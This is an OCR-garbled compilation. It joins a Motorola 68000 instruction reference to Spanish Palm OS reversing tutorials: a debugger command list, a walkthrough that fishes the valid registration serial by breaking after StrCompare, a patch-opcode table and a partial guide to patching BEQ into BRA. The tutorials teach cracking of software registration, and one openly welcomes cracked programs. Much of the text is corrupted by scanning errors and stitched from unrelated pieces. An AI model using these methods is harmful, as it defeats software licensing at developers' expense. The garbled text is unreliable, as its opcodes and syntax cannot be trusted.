LINK instruction does. An address register is elected to save the current pointer to the stack in A7; this assigned will 
become the pointer to the temporary reserved stack space. The stack pointer A7 is then decremented by however many 
bytes needed, but before being decremented, the assigned register itself is saved on the stack. This way, the called 
subroutine can perform a LINK to reserve space, knowing that it can call yet another subroutine, which can also 
perform a LINK with no registers being corrupted. The diagram shows what happens. 

LINK A0,+-10 

Before: After: Low memory | | |---------------- | Low memory A7 > || ||| 10 bytes | |---------------- ||| A7 > | Return 
address | |---------------- | |---—--------- | AO > | Previous AO | | | |---------------- | High memory | Return Address | 

| -----=--- | | | High memory Note that because ten bytes are required on stack going downwards in memory (as per 
normal stack practice), a negative displacement is specified in the LINK instruction. As the displacement is a signed 16- 
bit immediate value, a stack displacement of plus or minus 32K can be specified. The address register assigned to point 
to the top of the reserved space, or stack frame, is generally known as a frame pointer when used in this way. Note that 
as this register will be used with predecrement instructions, 1t initially points to one word above the frame. Syntax: 

LINK An, ffimm where *ffimm is plus or minus 32K. Flags affected: None. 

LSL - Logical Shift Left 


This instruction shifts the destination operand left by a specified number of bits. If you are shifting a data register, the 
number of bits to be shifted can be specified as an immediate value or as a value in another data register. The immediate 
value can be 1 to 8, whereas the data register value can be 1 to 64 (where zero acts as the 64 count). Data registers may 
be shifted as 8, 16 or 32 bit quantities. Only 16-bit word values can be shifted in memory and then only by one bit. Each 
bit shifted out of the left-hand side of an operand is placed in the Carry and Extend bits in the condition code register. 
As shown below, the bit shifted in at the right hand side is always a zero. C < < | <<< LSL <<< | < 0 X < Syntax: LSL 
Dn, Dn or LSL +timm 3-bit value, Dn or LSL memory (1 bit shift only). Flags affected: The Carry and Extend bits are 
set as per the most significant operand bit before the shift. The Overflow flag is reset to zero. The Negative and Zero 
flags are set as per result. 

LSR Logical Shift Right 

This instruction shifts the destination operand right by a specified number of bits. If you are shifting a data register, the 
number of bits to be shifted can be specified as an immediate value or as a value in another data register. The immediate 
value can specify a shift of 1 to 8, while the data register value can specify a shift of 1 to 64 (where zero acts as the 64 
count). Data registers may be shifted as 8, 16, or 32 bit quantities. Only 16-bit word values can be shifted in memory 
and then only by one bit. Each bit shifted out of the right hand side of an operand is placed in the Carry and Extend bits 
of the condition code register. As shown below, the bit shifted in at the left hand side is always a zero. > CO MSB >| 
>>> ASR >>> | > > X Syntax: LSR Dn, Dn or LSR Himm 3-bit value, Dn or LSR memory (1 bit shift only). Flags 
affected: The Carry and Extend bits are set as per the least significant operand bit before the shift. The Overflow flag is 
reset to zero. The Negative and Zero flags are set as per result. 

MOVE - Move Data 

This is the 68000's general purpose data-transfer instruction. Using one single opcode, data can be moved from register 
to register, register to memory, memory to register and memory to memory. The MOVE instruction can also be used to 
move data to (but not from) the condition code register, thus explicitly setting a particular set of conditions. If you are in 
privileged (or supervisor) mode, the MOVE instruction can be used to move data to the status register and to or from 
the user stack pointer. (Privileged mode is not required to move data from the status register.) With so many potential 
sources and destinations of data moves, the 68000 makes life easier by allowing all addressing modes to be used for the 
source. For destination, all except program counter relative addressing modes may be used. With data transfers 
involving memory and / or data registers, the data transfer can be made using 8, 16, or 32 bit quantities and is specified 
by appending .B, .W, or .L to the MOVE mnemonic. If the high-order bits of a data register are not involved in the data 
move, those bits remain unaffected by the transfer. Care should be used when mixing length of operands during routines 
using MOVE; if a byte is moved from a location using MOVE.B and then stored back again using MOVE.W, it will be 
stored in a memory location one byte higher than it was fetched from. Similary, storing it back with MOVE.L would 
store it three bytes higher than its original location. If the destination operand of the MOVE is the condition code 
register, the length of the source operand can only be eight bits. If the status register is involved as either source or 
destination of the move, only 16-bit transfers allowed. The instruction involving the user stack pointer is the only 
circumstance under which the 68000 allows optional access to either the user or the system stack pointer. Normally, the 
stack pointer is accessed as register A7. Whichever of two A7 registers is in effect depends on whether the processor is 
in supervisor or user mode. However, the supervisor mode may have a need to access the user stack pointer even though 
1t would normally only access the system stack pointer. This is why the privileged mode is required to access a 
normally unprotected register. Syntax: MOVE source, destination where source can be any addressing mode destination 
can be any addressing mode except program counter relative and immediate. Either of the above can be CCR, SR and 
USP (privileged mode only). Flags affected: When the MOVE source, destination format is used, the Negative and Zero 
flags are set as per the data moved, the Overflow and Carry flags are reset to zero and the Extend flag is unaffected. 
When the MOVE source, CCR /SR formats are used, the flags are set directly from the data. When the MOVE is done 
with the USP as an operand, no flags are affected. 

MOVEA - Move Address 

This specialized version of the MOVE command is used when the destination is an address register. The instruction 
only allows transfers of 16 or 32 bits in length. Byte transfers are not allowed with an address register as the destination. 
Also note that unlike the normal MOVE command, no flag bits are affected. Syntax: MOVEA source, An where source 
1s any addressing mode. Flags affected: None. MOVEM - Move Multiple 

This variation of the MOVE instruction allows multiple registers to be saved and restored using a single operation. Any 
of the 16 data or address registers can be moved this way. At the source code level, the registers chosen to be saved or 
restored are specified to the assembler in a list separated by slashes. Thus, to save DO, D3 and Al, the register list 


would be specified as DO/D3/A1. If a consecutive number of registers are included in the list, they can be idetified as 
such by a hyphen. So to save DO, D1, D2, DS and Al, the register list can be specified as DS5/DO-D2/A1. Notice that the 
order of register between slashes is unimportant; however, when the 68000 saves these registers, it does so in a definite 
order. It also retrives them in a definite (but opposite) order, so that if the registers are saved on the stack, they can be 
pulled off in a typical stack-like fashion (that is, last in first out). The order in which the 68000 saves registers is first 
A7 through AO, and then D7 through DO. Then in reverse order, DO is restored first, and restoration continues all the 
way through to A7. As the registers are most often saved in a stack formation, normally an address register is chosen to 
point to that stack. Then a predecrement addressing mode is used to push the registers down onto the stack. Conversely, 
when registers are being restored, a postincrement addressing mode is used. As an example, to save two registers at a 
memory location pointed to by A3, the instruction MOVEM D1/A1, -(A3) might be used. To restore them at another 
point in program, MOVEM (A3)+, D1/A1 would be correct. Note that registers can only be saved as words or long 
words. If they are saved as 16-bit words, then when they are restored, the upper half of the register is automtically sign- 
extended so that bit 15 fills the upper half of the register. Although less memory is used to save registers this way, such 
a loss of control of the upper 16 bits of every restored register may present problems unless you remain acutely aware 
of the possible corruption of an upper register half. the MOVEM instruction may be used with addressing modes other 
than predecrement and postincrement. By specifying other addressing modes as the source or destination of the multiple 
transfer, registers can be saved and restored in ascending locations in memory. The same register order is used, but they 
will not be stacked in at last in, first out order. Note that no flags are affected by this operation. Thus a subroutine can 
affect the condition code register, restore multiple registers with MOVEM, and return with the condition code register 
still intact. Syntax: MOVEM register list, destination address or MOVEM source address, register list or MOVEM 
register list, -(An) or MOVEM (An)+, register list. Flags affected: None. 

MOVEP - Move Peripheral Data 

This variation of the MOVE instruction is used to transfer data between the 68000 and certain peripherals. As input and 
output on the 68000 is memory-mapped, certain addresses will not actually be memory at all but will instead be external 
devices. The 68000 has a special design to allow 1t to use the many hardware interfaces that exist for 8-bit 
microprocessors, in particular the 6800. What this means to the programmer is that if a peripheral is interfaced to the 
68000 and is normally addressed at consecutive address on an 8-bit microprocessor, it will be addressed at every other 
address on the 68000 due to the design of its peripheral hardware bus. Thus the MOVEP instruction was included to 
address such peripherals. A long word of data from a data register can be transferred high byte first to every alternate 
memory (pheripheral) address with a single MOVEP to the first address. This also works the other way round in that 
every other word will be addressed starting with the source address specified in the MOVEP instruction. Only word or 
long word transfers are allowed. (A normal MOVE would be used for a single byte.) The only addressing mode allowed 
to specify the memory location is address register indirect with displacement, and only a data register can be used as the 
other operand. Syntax: MOVEP Dn, disp(An) or MOVEP disp(An), Dn where disp is a 16-bit displacement. 

MOVEO - Move Quick 

This variation on the MOVE instruction allows the quick loading of a data register with an immediate value. The 
MOVEQ variant works like a MOVE immediate value to the data register except that MOVEQ is much faster and only 
takes up two bytes in memory. The immediate value that is moved into a data register can only be in the range -128 to 
+127. This value is sign- extended into the entire 32 bits of the data register, so it is always of type .L despite the small 
immediate value. As this instruction works so fast, it is quicker to clear a data register with a MOVE +0, Dn than to use 
CLR Dn. MOVEQ cannot, however, be used with address registers or numbers larger than eight bits. Syntax: MOVEQ 
+timm 8-bit signed value, Dn. Flags affected: The Negative and Zero flags are set as per the immediate value; the 
Overflow and Carry flags are reset to zero, and the Extent flag is unaffected. 

MULES, MULU - Multiply Signed, Unsigned 

This instruction allow a multiplication to take place between a 16-bit source operand and the low order 16 bits of a data 
register. MULS assumes both numbers are signed, whereas MULU assumes both to be unsigned. The source can be a 
word from any memory location or the low-order 16 bits of a data register. The destination has to be a data register. The 
result is stored as a 32-bit signed or unsigned value in the destination register. The Negative flag in the condition code 
register is affected whether or not the operands are signed, and reflects the most significant bit of the result. Syntax: 
MULx Dn, Dn or MULx address, Dn where address is any addressing mode. Flags affected: The Negative and Zero 
flags are set as per the result. The Overflow and Carry flags are reset to zero. The Extend flag is unaffected. 

NBCD - Negate Binary Coded Decimal 

This specialized arithmetic instruction allows a single byte containing two binary coded decimal digits to be negated. 


The byte can be contained in the low portion of a data register or in memory. If the number is in memory, any memory 
addressing mode except program counter relative may be used. If the number is in data register, bits 8 to 31 are not 
affected. Syntax: NBCD Dn or NBCD address. Flags affected: The Negative and Overflow flag 1s undefined. The Zero 
flag 1s set per the contents of register. Carry and Extend are set as per the result of operation. 

NEG, NEGX - Negate Binary, Negate with Extend 

This instruction negates its operand. The result is the same as if the operand were subtracted from zero. The operand 
may be 8, 16, or 32 bits long as specified by the .B, .W, or .L mnemonic suffix. All flags are affected by this operation. 
A variation of this instruction exists to facilitate the manipulation of multiple-precision quantities where data is handled 
in segments. This is achived by using the Extend flag as set or reset from a previous arithmetic operation. The NEGX 
instruction works by subtracting its operand from zero then subtracting the Extend bit. All flags are affected by the 
result of the NEGX operation, but the Zero flag is only changed if the result becomes non-zero thus reflecting the 
nonzero state of a segmented number. For this reason, the Zero flag should be reset before performing code involving 
multiple use of NEGX. Syntax: NEG Dn or NEG address where address is any addressing mode except program 
counter relative. Flags affected: All. 

NOP - No Operation 

This instruction is a do-nothing opcode. It is used during program developement to leave room in a section of code. 
This space can be patched with machine-code instruction as necessary during debugging to test new routines within a 
previously written machine code level by substituting NOP instruction for the instructions and operands. Syntax: NOP. 
Flags affected: None. 

NOT - Logical NOT 

This instruction takes its operand and simply inverts all of its bits. (Each one-bit becomes zero and each zero-bit 
becomes one.) The operand can either be in a data register or memory and can be 8, 16, or 32 bits in length as per the . 
B, .W, or .L operand suffix. Syntax: NOT Dn or NOT address where address is any memory addressing mode except 
program counter relative. 

OR - Logical OR 

The OR opcode performs a logical OR operation. A number of bits in the source operand are ORed with the same 
number of bits in the destination operand where the result is left. The number of bits can be 8, 16, or 32 as the .B, .W, 
or .L opcode suffix. One or both operands must be a data register. Syntax: OR Dn, Dn or OR Dn, address or OR 
address, Dn where address is any addressing mode with the proviso that program counter relative may not be used as 
destination. 

ORI - Logical OR Immediate 

This instruction logically ORs a byte, word, or long word immediate value with the destination. The destination address 
can be a data register, memory, or one of two special cases: the condition code register and the status register. If the 
destination is the condition code register, only a byte-length immediate value is allowed. If the destination is the status 
register, only a word-length immediate value is allowed, and the processor must be in supervisor mode or else a 
privilege voilation will occur. Syntax: ORI +imm, Dn or ORI H+imm, address or ORI.B ftimm 8-bit value, CCR or ORL 
W +timm 16-bit value, SR (Privileged). Flags affected: The Overflow and Carry bits are reset, the Negative and Zero 
bits set as per the result, and the Extend bit is unaffected. 

PEA - Push Effective Address 

This instruction takes the effective address of its operands and pushes it onto the stack as pointed to by the stack pointer 
A7. The operand can be nearly any addressing mode and is represented as a 32-bit long word. Only two addressing 
modes are excluded from the list of possibilities. Due to the fact that address register indirect with postincrement or 
predecrement represent a dynamically increasing or decreasing address, these two modes cannot be used with PEA. But 
any other address, no matter how complicated, (including address register indirect with displacement and index) can be 
pushed onto the stack. This saves performing the address arithmetic within the program. The processor will 
automatically push the same value as the calculated address - or in other words "the effective address". The destination 
address on the stack is loaded with a 32-bit long value even though the address will only be 24 bits long. No flags are 
affected by the result of the address calculation. Syntax: PEA address where address is any memory addressing mode 
except postincrement and predecrement. Flags affected: None. 

RESET - Reset External Devices 

This instruction sends out a pulse from the RESET pin of the 68000. It is normally used when a system is first powered 
up to reset all devices to a known state. It is only likely to be used after that if a hardware fault-condition developes. 
Because it is such a powerful opcode, it is restricted to use in supervisor mode only. Syntax: RESET Flags affected: 


None. 

ROL, ROXL - Rotate Left, Rotate Extended Left 

These two instructions both rotate the destination operand left by a specified number of bits. If you are rotating a data 
register, the number of bits can be specified as an immediate value or as a value in another data register. The immediate 
value can be 1 to 8, whereas the data register value can be 1 to 64 (where zero acts as the 64 count). Data registers may 
be rotated as 8, 16, or 32 bit quantities. Only 16-bit word values can be rotated im memory and then only by one bit. As 
shown, each bit rotated out of the left hand side of the operand is placed in the Carry bit of the condition code register, 
and in case of ROXL, also in the Extend bit. The bit rotated in at the right is the most significant bit for ROL or the 
Extend bit for ROXL. Thus, one more bit is involved in the ROXL rotate than in the ROL rotate. Note that ROL does 
not affect the Extend flag in the condition code register. C <| <<< ROL <<<|<C<>>>>>>>>><|<<<ROXL 
<<<|<<X<>>>>>>>>>> >>> Syntax: ROL Dn, Dn or ROL +timm, Dn or ROL address. Flags affected: The 
Negative flag is set as per most significant bit before the rotate. The Zero flag is set as per resultant operand. The 
Overflow flag is reset to zero. The Extend flag is unaffected by ROL, but contains the previous most significant bit for 
ROXL. 

ROR, ROXL - Rotate Right, Rotate Extended Right 

These two instructions both rotate the destination operand right by a specified number of bits. If you are rotating a data 
register, the number of bits can be specified as an immediate value or as a value in another data register. The immediate 
value can be 1 to 8, whereas the data register value can be 1 to 64 (where zero acts as the 64 count). Data registers may 
be rotated as 8, 16, or 32 bit quantities. Only 16-bit word values can be rotated im memory and then only by one bit. As 
shown, each bit rotated out of the right hand side of the operand is placed in the Carry bit of the condition code register 
and in case of ROXR, also in the Extend bit. The bit rotated in at the left is the least significant bit for ROR or the 
Extend bit for ROXR. Thus, one more bit is involved in the ROXR rotate than in the ROR rotate. Note that ROR does 
not affect the Extend flag in the condition code register. >| >>> ROR >>>|>C>C<<<<<<<<<>|>>> ROXR 
>>> |>>X><<<<<<<<<<< << Syntax: ROR Dn, Dn or ROR +timm, Dn or ROR address. Flags affected: The 
Negative flag is set as per most significant bit before the rotate. The Zero flag is set as per resultant operand. The 
Overflow flag is reset to zero. The Extend flag is unaffected by ROR, but contains the previous most significant bit for 
ROXR. 

RTE - Return from Exception, RTR - Return and Restore CCR, RTS - Return from Subroutine 

These instructions change program control by loading the program counter with an execution address previously saved 
on the stack. The most common version is RTS, which simply pulls the saved address from the stack, increments A7 to 
allow reuse of the stack space, and reloads the program counter. RTE excepts to find a previously saved status register 
word on the stack, which it pulls and restores prior to reloading the program counter. As RTE accesses the privileged 
byte of the status register, 1t can only be executed in supervisor mode or else a privilege voilation trap will occur. RTR 
expects to find a previously saved condition code register word on the stack, which it pulls and restores prior to 
reloading the program counter. Syntax: RTS or RTE or RTR. Flags affected: No flags are affected by RTS. All flags are 
reloaded by RTE and RTR. 

SBCD - Subtract Binary Coded Decimal 

This instruction a specialized arithmetic instruction that subtracts one bytes from another (only bytes) when each byte 
containis binary-coded decimal numbers. The subtraction can be performed either on two data registers or between two 
memory locations. If performed on bytes in memory, only address register indirect with predecrement can be used. This 
facilitates easy manipulation of multiple-precision BCD numbers. The extend bit is subtracted along with the BCD 
bytes to allow this multiprecision data manipulation. Also note that the zero flag is only changed if the result becomes 
nonzero. Therefore, both the Extend and Zero bits in the condition code register should be perset before the operation is 
performed. The Extend bit would normally be preset to a zero (to prevent extension on the first subtraction) and the 
Zero bit to a one (to signify a zero result prior to the first subtraction). A MOVE +4, CCR would preset these flags 
correctly. Syntax: SBCD Dn, Dn or SBCD -(An), -(An) Flags affected: The Zero flag is cleared 1f the result becomes 
nonzero. The Carry and Extend flags are set if a decimal borrow is generated. The Negative and Overflow bits are 
undefined. 

Sec - Set from Conditions Codes 

This instruction sets a single byte specified in the operand to all zeroes or all ones according to the condition codes. The 
condition codes which may be used are the same as for the decrement and branch opcode. If the specified condition is 
true as reflected in the condition code register, the destination byte is set to all ones ($FFE). If it is not true, the 
destination byte is set to zero. The destination can be the low-order byte of a data register or a byte in memory. This 


instruction is of particular value saving status of a specific condition code. EQ - Equal to NE - Not equal to MI - Minus 
PL - Plus CS - Carry set CC - Carry clear VS - Overflow set VC - Overflow clear HI - Higher LS - Less than or same 
HS - Higher or same LO - Lower GT - Greater GE - Greater than or equal to LE - Less than or equal to LT - Less than 
F - False Always false => MOVE +t$0 T - True Always true => MOVE +$FF Syntax: Scc Dn or Scc address where 
address is any addressing mode except program counter relative. Flags affected: None. 

STOP - Stop processor and wait 

This is a privileged instruction that first copies its operand (which is an immediate word value) into the status register 
and then halts the processor. The processor will remain in this state until it receives an interrupt that is not masked by 
the interrupt mask into the status register. Syntax: STOP +timm 16-bit value (Privileged). Flags affected: All flags are 
set as per the immediate value. 

SUB - Subtract Binary 

The SUB instruction subtracts the source operand from the destination operand with the result appearing in the 
destination. It is possible to subtract bytes, words, or long words with this opcode by appending .B, .W, or .L to the 
mnemonic. Either the source or destination (or both) must be a data register. The source operand can be any memory 
location or data register, and the destination operand can also be any memory location or data register. Syntax: SUB Dn, 
Dn or SUB address, Dn or SUB Dn, address Flags affected: The Extend, Negative, Zero, Overflow, and Carry flags are 
all affected as per the result of the subtraction. 

SUBA - Subtract Address 

This variant of the SUB instruction only differs in that an address register is specified as the destination. As an address 
rather than data is being manipulated, the condition code flags are left unaffected. Only sign-extended words or long 
words can be subtracted. 

SUBI - Subtract Immediate 

This variant of the SUB instruction is used to subtract a constant value from the destination. The immediate operand can 
be any 8-, 16-, or 32-bit value as specified by the .B, .W, or .L opcode suffix. The destination cannot be an address 
register or a program counter relative address. Syntax: SUBI +timm, Dn or SUBI +timm, address where address is any 
memory addressing mode except program counter relative. Flags affected: The Extend, Negative, Zero, Overflow, and 
Carry flags are all set as per the result of the subtraction. 

SUBO - Subtract Quick 

This variant of the SUB instruction is used to subtract a small integer between one and eight from the destination. The 
destination can be a memory location, a data register, or an address register. If it is an address register, the condition 
code flags are unaffected and the operand length cannot be a byte. This operation takes the place of the decrement 
instruction found on other processors. Syntax: SUBQ +imm, Rn or SUBQ +ftimm, address. Flags affected: The Extend, 
Negative, Zero, Overflow, and Carry flags are all set as per the result of the subtraction unless the destination is an 
address register. 

SUBX - Subtract Extended 

This variant of the SUB instruction subtracts two numbers and the Extend bit of the condition code register. This allows 
multiple-precision subtractions to be performed. For this reason, the Zero flag is only affected when a non-zero result is 
obtained. This means that if multiple numbers are subtracted using SUBX, the Zero flag will stay reset if any of those 
numbers were non-zero. Syntax: SUBX Dn, Dn or SUBX -(An), -(An). 

SWAP - Swap Data register halves 

This instruction takes the lower 16 bits of the specified data register and swaps it with the upper 16 bits. It can only be 
used with data registers and only on the fixed word length in each half. Syntax: SWAP Dn. Flags affected: The 
Negative and Zero flags are set to reflect the 32-bit result. The Overflow and Carry flags are reset to zero. The Extend 
flag is unaffected. 

TAS - Test and Set 

This is a highly specialized instruction that is used to test a byte in memory or in a data register. When the condition 
codes are set as per the byte's contents, bit 7 (the most significant bit) of the byte is set to a one. This operation is 
achived in an uninterruptible read-modify-write cycle. It is the only instruction on the 68000 that uses this method. Its 
importance lies in the fact that no interrupt can cause a read of the accessed byte before the operation is finished. If the 
operation were done in two steps, an interrupt could occur before the byte was changed, which would allow the 
interrupting routine to scan the byte and draw an erroneous conclution as to its status. Syntax: TAS Dn or TAS address 
where address is any addressing mode except program counter relative. Flags affected: The Negative and Zero flags are 
set as per the byte before modification. The Overflow and Carry flags are reset to zero. The Extend flag is unaffected. 


TRAP - Software Trap 

This instruction causes a trap to occur in the same manner as if it had been caused by a hardware-detected condition. 
The processor will jump to one of the 16 special addresses set up in the first 1024 bytes of memory. The actual address 
that will be jumped to is determined by the operand supplied with the opcode. This will be a number from 0 to 15. The 
software trap vectors are 32-bit addresses stored in memory starting at location +128. Before the specified vector is 
taken, the status register and program counter are pushed onto the stack to facilitate a return via an RTE instruction. 
Syntax: TRAP +timm where +timm is an immediate value from O to 15. Flags affected: None. 

TRAPV - Trap if Overflow 

This instruction causes a trap to occur to the address in location +28 in low memory if the Overflow flag is set in the 
condition code register. Before the overflow vector is taken, the status register and program counter are pushed onto the 
stack to facilitate a return via an RTE instruction. Syntax: TRAPV Flags affected: None. 

TST - Test Operand 

This instruction causes the processor to scan the operand and set the condition code flags according to the contents. The 
operand can be 8, 16, or 32 bytes as specified in the .B, .W, or .L opcode modifier. No registers other than the condition 
code register are changed. The operand can be either a data register or a memory location. Syntax: TST Dn or TST 
address where address is any addressing mode except program counter relative. 

UNLK - Unlink 

This instruction is the reverse of the LINK opcode. It takes the address in the specified address register and loads the 
stack pointer (A7) with it. This removes any space allocated on the stack for temporary storage. The stack pointer then 
points at the previous contents of the address register (the frame pointer). This contents would have been placed there 
by a previous LINK instruction. The frame pointer is automatically reloaded by pulling the value from the stack. Both 
the frame pointer and the stack pointer are therefore returned to their values before the last LINK. This entire operation 
1s performed automatically by a single UNLK instruction. Syntax: UNLK An Flags affected: None. 
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INTRODUCCION 
QUE ES MEJOR PALM(Palm Os) O POCKET(Windows CE) 


AL ATAQUE 


Ufff la eteeeeerna pregunta, es como: 


¿Windows o Linux? 

¿Intel o AMD? 

¿Cola-cao o Neskuik? 
¿Clicks o Airgamboys? 
¿Cocacola o Pepsi? 

¿Burger King o McDonalds? 
¿Pc Armada ó de Marca? 


Y un largo listado etc... 


Yo personalmente prefiero Palm OS. Lo veo más profesional, optimiza más los recursos, más aplicaciones, menos 
cuelgues que pocket Pc, menos peso, menor precio, Millones de programas para palm, en cambio pocket solo cientos 
de programas. 


En fin, es una opinión, pero si quisieras comparte una pda. de baja gama (para probar que tal el mundo de las pda 
pocket entonces comprala sabiendo sus grandes limitaciones) qué modelo de Asistente Personal te comprarías? No 
existe el equivalente a la Palm Tungstent TS en PocketPc. Al menos que yo sepa. 


Por otro lado estoy harto de los cuelgues de systema de Pocket XP , De pantallazos azules de la muerte, dll 
conflictivas, y en resumen, que también ocurren en Windows y más en Pocket XP (es increible como un sistema tan 
malo ha podido tener tanta aceptación). 


Nunca le pondría Windows (ni CE ó XP ni nada) a un marcapasos que me tuvieran que poner, no se si me explico... 


Elige lo que quieras, pero lee mucho en foros para tener capacidad de decisión. 
Y si al final te decides por Palm OS, Aquí debes de regresar!! 


"El optimista tiene siempre un proyecto; el pesimista, una excusa." 


Por cierto ya he leído los tutoriales de palm spanish tutor y son muy buenos. 


Esto del reversing Palm Hasta sirve para hacer más comerciales las Palm's debido a su gran cantidad de programas 
crackeados listos para ser instalados en nuestras Palm, Pocket Pc en cambio tiene solo el 10% de las aplicaciones que 
ha creado Palm (El secreto quizás radica en que Palm Ha liberado gran cantidad de aplicaciones con código fuente y 
ejemplos de aplicaciones Palm orientadas ha objetos), Por otra parte las aplicaciones Palm son de tamaño pequeño a 
diferencia de Pocket que requiere megas para una simple aplicación, Palm ya ha sobrepasado a Pocket XP ó 2005 
debido a la introducción de sus nuevos modelos que pueden tomar fotografías, grabar vídeo en tiempo real, hasta ver 
la Higth TV, Receptor GPS gracias a sus tarjetas de expansión ó gatgets podemos instalar una gran cantidad de 
accesorios de hardware, Resolución de Pantalla de 800X600, Aunque Pocket Pc es Multitarea y Palm No. Por cierto a 
mi Palm Os No me da ninguna comisión por este comentario. 


Hasta la próxima y ya he visto que la gente se empieza a animar a enviar sus tutoriales. 
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INTRODUCCION 
Debuffer 1.2 Resumen de comandos 


AL ATAQUE 


Poner una trampa Debugger (Protección Antidebugger) 
Poner un OPCODE 4K48 en archivo pre. 


Abandonando una tarea 


El tipo bye (sin poner ninguna comilla) para salir. Si no se nos muestra ningún aviso por el debugger , "entonces 
presionamos Ctrl+C" Para salir del debugger". 


Sintaxis 


Los instrucciones para cada comando se guardan en la pila (memoria) inmediatamente después de mandar una orden. 
Para desensamblar las siguientes 10 instrucciones usamos: 
type "pc E 10 dis" 


Registros 
.regs (-) Imprime todos los registros. 


Los registros para un micro DragonBall son mapeados ADELANTANDO las variables en el debuffer. 
El acceso de cada uso de nombre de registro es: 

d0, d1, d2, d3, d4, d5, d6, d7, 

a0, al, a2, a3, a4, a5, a6, usp, ssp, pc, and sr. fp es un alias para a6. 


Todos los registros excepto sr son de 32 bits, sr es de 16 bits. 


Ver y modificacar la memoria (pila) 

CObyte ( addr --n ) Llamar 8 bits de un valor contenido en una dirección. 
(word (addr--n) Llamar 16-bit de un valor contenido en una dirección. 
COlong ( addr --n) Llamar 32-de un valor contenido en una dirección. 

!byte ( byte addr -- ) Almacenar 8-bit de un valor contenido en una dirección. 
word ( word addr -- ) Almacenar 16-bit de un valor contenido en una dirección. 


tlong (long addr --) Almacenar 32-bit de un valor contenido en una dirección. 
da ( addr count -- ) Dump ASCII. 


db ( addr count -- ) Dump bytes. 
dd ( addr count -- ) Dump double-words (longs). 
dw ( addr count -- ) Dump words (Copiar datos de la memoria a una pantalla.). 


dis ( addr count --) Contar instrucciones desensambladas contenidas en una dirección. 


Breakpoints 

be ( bpid -- ) Borrar breakpoint. 

bd ( bpid -- ) Desabilitar breakpoint. 

be ( bpid -- ) Habilitar breakpoint. 

bl(--) Listar breakpoints. 

bp (addr --) Poner un breakpoint. 

bp Toma una cadena opcional de un argumento ejecutado cuando el breakpoint es producido. 


Control de la Ejecución 


go (--) Resumir ejecución. 

next (--) Pasar a la siguiente instrucción, Sobre un ramal. 
nospy (--) Remover cualquier paso espía instalado. 

out ( -- ) Salir un paso afuera de la actual rutina. 

spy (addr value --) Instalar un paso espia para *addr == value. 

step (--) Pasar a la siguiente instrucción, dentro de los ramales. 
to ( addr -- ) Correr una rutina especifica. 

wait ( -- ) Esperar a que algo ocurra. 


Miscelánea (Variado) 
bt (--) Rastrear trazos previos (Backtrace) 
In (addr -- ) Lookup el nombre determinado de una dirección. 


Debuffer Tips 


Pescar el serial después de una StrCompare 
Partir desde una StrCompare de la rutina donde se genera la comprobación del serial 


Por ejemplo: 


000037f4 DC.W sysTrapFIdGetTextPtr 


000037f4 2648 MOVEA.L AO0,A3 

000037f6  2f0b MOVE.L A3,-(A7) 

000037f8  486dfba4 PEA -1116(A5) 

000037fc 4e4fa0c8 TRAP +15 

00003800 DC.W sysTrapStrCompare 

00003800 — 4a40 TST.W DO  <---- break here! , Parar Aqui 
00003802  4fef000c LEA 12(A7),A7 

00003806 6636 BNE L488 


¿Como podemos leer los valores con el Debuffer? 


Está bien, primero echemos un vistazo a las definiciones de las API de PalmOs 
PalmOS API StrCompare Routine 


StrCompare 


Definición: Comparar dos cadenas de caracteres. 

Prototipo : Int StrCompare (CharPtr s1, CharPtr s2) 

Parámetros : S1, s2 Dos punteros de cadena de caracteres. 

Resultados: 

Regresa cero si las cadenas son iguales 

Regresa un numero positivo si sl esta alfabeticamente antes de s2 

Comentarios 

Usaremos esta funcion en lugar de rutina standard stremp. 

Esta función es sensible al caso. La usaremos para clasificar cadenas pero no para encontrarlas. 

Esta función realiza una comparación de carácter por carácter de s1 y s2 y regresa tan pronto como las 2 cadenas son 
desiguales. Por ejemplo, si comparamos la cadena "cereal" con la cadena "Coliflor," entonces StrCompare regresa que 
"cereal" debería aparecer antes de "Coliflor" porque clasifica la letra "c" antes de "C"" 


Depurando una Sesión 


Ok seleccionamos un break en el debuffer con un OPCODE 4E48 justamente debajo del StrCompare y arrancamos el 
Debuffer.. 

Y ahora debemos llevar a lo 2 Punteros a los Strings.... 

Podemos hacer esto con la siguiente orden en Debuffer: 


Ssp € 8 db 


Esto nos mostrara los 2 Punteros para las cadenas de caracteres respectivas en formato hexadecimal. 
El puntero para String] es: 


0001304e 


El puntero para String2 es: 
00002750 


loading ficl 0-0 extensions 

loading ficl utility classes 

debuffer 1.2 -— loading... 

Type "bye" to exit. Type "help" for online help. 
Waiting for debug event... (Ctrl1+C exits> 


Para ver las cadenas necesitamos convertir valores hexadecimales a valores de direcciones decimales. 
0001804e -> dec: 98382 y 00002750 -> dec: 10064 

Con el comando del debugger : 98382 20 db Podemos ver 20 bytes de la primera cadena .) 

hey 

La segunda cadena muestra mi fake Serial (Serial Falso).. 


loading ficl 0-0 extensions 

loading ficl utility classes 

debuffer 1.2 — loading... 

Type "bye" to exit. Type "help" for online help. 

Waiting for debug event... (Ctrl+C exits> 

ok> ssp Y 8 db 
(515) 86 4e BB BA 27 58 A y 
28 
37 35 37 32 35 37 34 MM BB BB BA BB BB BA BA 71572574 

: BB Ba an A 

28 
31 33 34 35 06M 29 16 BB BB 21 78 BB BB BB BA 12345.>...*tx. 
(515) Ba 18 a 


Esto es todo amigos hasta la próxima emisión mismo canal misma hora. 
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()Serial ()HotSync/Code ()Trial ()Multiprotección ()Encriptado (X)Otro 
Tabla de instrucciones para nuestros fines 


http://www. google.com 


INTRODUCCION 


Analizar instrucciones para futuros parches de instrucciones. 


AL ATAQUE 


——isiracción | Ci Hecadecinal 


[| Imstrueción [| CódigoHexadecimal | 


MOVE.L +$0,D2 [| 7400 | 
MOVE.L +*$0,D3 | 760 | 


[| Instrucción [  CódigoHexadecimal | 


——nsirucción Cto Hesadecimal 


Move.B +1, DO 103C0001 
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PROTECCION: Se Aprenderá ha ubicar una función en el editor hexadecimal teniendo el desensamblado 


INTRODUCCION 


Muchas veces nos hemos preguntado donde debo parchar una función , por ejemplo si ya descubrimos la protección y queremos nopearla 
cambiando BEQ por un BRA , veamos la imagen siguiente para ver como trabaja el microprocesador. 


Este ejemplo muestra un archivo previamente desensamblado con PalmDemon v0.27 y abierto el archivo original con el editor hexadecimal 
Ultraedit32 v10. Los dos archivos los miramos de manera vertical para ver comparativas. 


€ UltraE dit-32 - C:1My Downloads TuningFork 1.1 - Key(6905924416) Full Afinador Tenedor .txt 
|| Archivo Editar Buscar Proyecto Wer Formato Columna Macro Avanzado Wentana ¿Ayuda 


